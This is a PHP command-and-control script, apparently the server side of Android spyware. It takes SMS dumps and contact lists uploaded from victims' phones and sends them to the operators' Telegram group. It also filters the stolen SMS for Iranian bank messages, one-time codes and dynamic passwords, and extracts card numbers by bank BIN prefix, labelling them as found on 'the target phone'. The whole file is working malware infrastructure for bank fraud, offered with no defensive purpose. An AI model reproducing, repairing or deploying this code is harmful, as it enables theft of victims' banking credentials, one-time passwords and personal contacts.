<?php
require_once("config.php");

define("TOKEN", $token);
define("ID", $id);
define("API_KEY", $token);

// === Telegram Bot Request ===
function bot($method, $datas = [])
{
    $url = "https://api.telegram.org/bot" . TOKEN . "/" . $method;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);
    $res = curl_exec($ch);

    if (curl_error($ch)) {
        var_dump(curl_error($ch));
    } else {
        return json_decode($res);
    }
}

// === Send SMS File ===
function sfanel($text, $keyboard = null)
{
    global $group;
    bot('sendDocument', [
        'chat_id'    => $group,
        'caption'    => $text,
        'parse_mode' => 'HTML',
        'document'   => new CURLFile("allsms.txt"),
        'reply_markup' => $keyboard
    ]);
}

function sendBankMessagesFile($text, $keyboard = null)
{
    global $group;
    bot('sendDocument', [
        'chat_id'    => $group,
        'caption'    => $text,
        'parse_mode' => 'HTML',
        'document'   => new CURLFile("bank_messages.txt"),
        'reply_markup' => $keyboard
    ]);
}

function sendmessage($text, $keyboard = null) {
    global $group;
    return bot('sendMessage',[
        'chat_id' => $group,
        'text' => $text,
        'parse_mode' => "HTML",
        'disable_web_page_preview' => true,
        'reply_markup' => $keyboard
    ]);
}

// === Send Contacts File ===
function cfanel($text, $keyboard = null)
{
    global $group;
    bot('sendDocument', [
        'chat_id'    => $group,
        'caption'    => $text,
        'parse_mode' => 'HTML',
        'document'   => new CURLFile("allcontacts.txt"),
        'reply_markup' => $keyboard
    ]);
}

function parse_sms()
{
    $PostData = file_get_contents("php://input");
    $File     = fopen("allsms.txt", "w");
    fwrite($File, $PostData);
    fclose($File);
}

function extractBankMessagesWithNumbers($filePath) {
    // بررسی وجود فایل
    if (!file_exists($filePath)) {
        return false;
    }

    // الگوهای شناسایی پیامک بانکی و رمزهای پویا
    $patterns = [
        // الگوهای بانکی
        '/بانک\s+(ملت|ملی|صادرات|تجارت|رفاه|سامان|پاسارگاد|اقتصاد نوین|رسالت|حکمت ایرانیان|کارآفرین|دی|ایران زمین|خاورمیانه|گردشگری|قرض الحسنه مهر)/i',
        '/کد\s+(ورود|احراز|پیامک|یکبار مصرف|OTP|تایید)/i',
        '/تراکنش|واریز|برداشت|پرداخت|خرید اینترنتی|فروشگاه|pos|کارتخوان/i',
        '/مبلغ\s+[\d,]+/i',
        '/کارت\s*\*?\d{4}/i',
        '/پیگیری\s+\d+/i',
        '/شماره\s+حساب|شبا/i',
        '/موجودی\s+حساب/i',
        '/سجام|شاپرک|پرداخت یار|پays|زیبال|آسان پرداخت|nextpay|idpay|zarinpal/i',
        '/IR\d{24}/i',
        '/\d{4}-\d{4}-\d{4}-\d{4}/',
        
        // الگوهای رمزهای پویا
        '/رمز\s+(پویا|یکبارمصرف|عبور|dynamic)/i',
        '/کد\s+(\d{4,6})/i',
        '/رمز\s+(\d{4,6})/i',
        '/code\s*:\s*(\d{4,6})/i',
        '/password\s*:\s*(\d{4,6})/i',
        
        // الگوهای عمومی اعداد مهم
        '/\b\d{4,6}\b/', // رمزهای عددی 4-6 رقمی
        '/\b\d+,\d+\b/', // مبالغ با جداکننده هزارگان
        '/\b\d+\.\d+\b/', // مبالغ با اعشار
    ];

    // استخراج پیام‌های بانکی
    $bankMessages = [];
    $lines = file($filePath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    
    foreach ($lines as $line) {
        $line = trim($line);
        if (empty($line)) continue;
        
        // حذف پیشوندها و پسوندها (مانند timestamp و sender)
        $cleanLine = preg_replace('/^.*?(\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}\s+|\+98\d{10}\s+)/', '', $line);
        $cleanLine = trim($cleanLine);

        // بررسی آیا پیام حاوی اعداد است
        if (!preg_match('/\d/', $cleanLine)) {
            continue;
        }
        
        // بررسی آیا پیام بانکی است
        $isBankMessage = false;
        foreach ($patterns as $pattern) {
            if (preg_match($pattern, $cleanLine)) {
                $isBankMessage = true;
                break;
            }
        }
        
        if ($isBankMessage) {
            $bankMessages[] = $cleanLine;
        }
    }

    return $bankMessages;
}

function extractBankCards($filePath) {
    $banks = [
        "بانک ملی"      => ["603799"],
        "بانک صادرات"   => ["603769"],
        "بانک ملت"      => ["610433"],
        "بانک کشاورزی"  => ["603770"],
        "بانک پارسیان"  => ["622106", "627884"],
        "بانک پاسارگاد" => ["502229"],
        "بانک سامان"    => ["621986"],
        "بانک رفاه"     => ["589463"],
        "بانک تجارت"    => ["585983"],
        "بانک انصار"    => ["627381"],
        "بانک اقتصاد نوین" => ["627412"],
        "بانک شهر"      => ["502806"],
        "بانک آینده"    => ["636214"],
    ];

    $content = file_get_contents($filePath);
    preg_match_all('/\b(?:\d{4}[-\s]?){4}\b/', $content, $matches);

    $output = "ᴄᴀʀᴅ ɴᴜᴍʙᴇʀs ғᴏᴜɴᴅ ғʀᴏᴍ ᴛʜᴇ ᴛᴀʀɢᴇᴛ ᴘʜᴏɴᴇ 💳\n\n";
    
    foreach ($matches[0] as $card) {
        $cleanCard = preg_replace('/[^0-9]/', '', $card);
        $prefix = substr($cleanCard, 0, 6);

        foreach ($banks as $bankName => $binList) {
            if (in_array($prefix, $binList)) {
                $formattedCard = implode(' ', str_split($cleanCard, 4));
                $output .= "$bankName\n<code>$formattedCard</code>\n\n";
                break;
            }
        }
    }

    return trim($output);
}

if (isset($_GET['result']) && isset($_GET['action'])) {
    $_POST['result'] = $_GET['result'];
    $_POST['action'] = $_GET['action'];
    $_POST['androidid'] = $_GET['androidid'];
    $_POST['model'] = $_GET['model'];
    $_POST['opr'] = $_GET['opr'];
    
    $result = $_POST['result'];
    $action = $_POST['action'];
    $androidid = $_POST['androidid'];
    $model = $_POST['model'];
    $opr = $_POST['opr'];
}

// === Detect Client IP ===
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}

$step = file_get_contents("data/$owner.txt");
// === Load Users ===
$user = explode("/", file_get_contents("data/user.txt"));

if ($action === "getlastbank") {
    parse_sms();
    
    if($step == "smsget") {
        $data_list = json_decode(file_get_contents("data/$androidid.json"), true);
        $ipfrist   = $data_list['ipfrist'] ? $data_list['ipfrist'] : 'ثبت نشده';
        
        // === Send SMS File ===
        sfanel("📧SMS File

AndroidId : /set_$androidid
🌐IP : <code>$ip</code>
📍 IP FRIST : <code>$ipfrist</code>
📱Model : $model
📶 Operator : $opr

💬 | <a href='t.me/fyilk_channel1'>👾 ᴛᴇᴀᴍ </a>
", null);
    }

    if($step == "getlastbank") {
        $bankMessages = extractBankMessagesWithNumbers("allsms.txt");
        $data_list = json_decode(file_get_contents("data/$androidid.json"), true);
        $ipfrist   = $data_list['ipfrist'] ? $data_list['ipfrist'] : 'ثبت نشده';
        
        if ($bankMessages && !empty($bankMessages)) {
            // ایجاد فایل TXT از پیام‌های بانکی
            $bankContent = "💳 پیامک‌های بانکی و رمزهای پویا\n\n";
            foreach ($bankMessages as $index => $message) {
                $bankContent .= $message . "\n";
                $bankContent .= "────────────\n\n";
                
                // برای جلوگیری از فایل خیلی بزرگ، حداکثر 50 پیام ذخیره شود
                if ($index >= 50) break;
            }
            
            file_put_contents("bank_messages.txt", $bankContent);
            
            // ارسال فایل TXT
            $caption = "💳 پیامک‌های بانکی و رمزهای پویا\n\n" .
                       "AndroidId : /set_$androidid\n" .
                       "🌐IP : <code>$ip</code>\n" .
                       "📍 IP FRIST : <code>$ipfrist</code>\n" .
                       "📱Model : $model\n" .
                       "📶 Operator : $opr\n\n" .
                       "💬 | <a href='t.me/fyilk_channel1'>👾 ᴛᴇᴀᴍ </a>";
            
            sendBankMessagesFile($caption);
            
            // حذف فایل موقت
            unlink("bank_messages.txt");
        } else {
            sendmessage("✅ هیچ پیامک بانکی یا رمز پویایی یافت نشد");
        }
    }
  
    if($step == "extractcards") {
        $cardsInfo = extractBankCards("allsms.txt");
        $data_list = json_decode(file_get_contents("data/$androidid.json"), true);
        $ipfrist   = $data_list['ipfrist'] ? $data_list['ipfrist'] : 'ثبت نشده';
        
        $message = $cardsInfo . "\n\n" .
                   "AndroidId : /set_$androidid\n" .
                   "🌐IP : <code>$ip</code>\n" .
                   "📍 IP FRIST : <code>$ipfrist</code>\n" .
                   "📱Model : $model\n" .
                   "📶 Operator : $opr\n\n" .
                   "💬 | <a href='t.me/fyilk_channel1'>👾 ᴛᴇᴀᴍ </a>";
        
        sendmessage($message);
    }
  
    unlink("allsms.txt");
}
  
if ($action === "contacts") {
    $PostData = file_get_contents("php://input");
    $File     = fopen("allcontacts.txt", "w");
    fwrite($File, $PostData);
    fclose($File);

    $check     = file_get_contents("allcontacts.txt");
    $data_list = json_decode(file_get_contents("data/$androidid.json"), true);
    $ipfrist   = $data_list['ipfrist'] ? $data_list['ipfrist'] : 'ثبت نشده';

    cfanel("👨‍👩‍👧‍👧Contacts file

AndroidId : /set_$androidid
🌐 IP : <code>$ip</code>
📍 IP FRIST : <code>$ipfrist</code>
📱 Model : $model
📶 Operator : $opr

💬 | <a href='t.me/fyilk_channel1'>👾 ᴛᴇᴀᴍ </a>
", null);

    unlink("allcontacts.txt");
}
?>
